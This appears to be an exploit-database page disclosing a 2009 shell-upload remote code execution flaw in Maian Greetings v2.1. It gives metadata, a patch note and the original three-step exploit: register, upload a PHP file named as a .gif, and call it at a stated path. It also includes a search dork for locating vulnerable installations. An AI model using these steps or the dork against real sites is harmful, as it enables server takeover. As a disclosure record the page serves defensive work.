header-logo
Suggest Exploit
vendor:
Maian Greetings
by:
indoushka
9,3
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Maian Greetings
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:maian_scripts:maian_greetings
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

Shell Upload Vulnerability in Maian Greetings v2.1

A remote code execution vulnerability exists in Maian Greetings v2.1. An attacker can exploit this vulnerability by creating an account on the vulnerable application, uploading a malicious file, and accessing it via the ‘images/uploads/user1_1264680573.php.gif’ URL. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Maian Greetings.
Source

Exploit-DB raw data:

========================================================================================            
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iq-ty.com/vb - Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                             
| # Web Site : http://www.maianscriptworld.co.uk/free-php-scripts/maian-uploader/free-file-upload-system/index.html                                                                                                                            
| # Dork     : Powered by Maian Greetings v2.1                                         
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Shell Upload                                                                     
======================      Exploit By indoushka       =================================
# Exploit  : 
 
 1- (First Create Account) http://127.0.0.1/greetings/index.php?cmd=account
 
 2- (Second Upload your file) http://127.0.0.1/greetings/index.php?cmd=ecard&random=1
 
 3- (Third Find It in) http://127.0.0.1/greetings/images/uploads/user1_1264680573.php.gif
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad ======================================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net 
www.alkrsan.net * www.kadmiwe.net * www.arhack.net   
--------------------------------------------------------------------------------------------------------------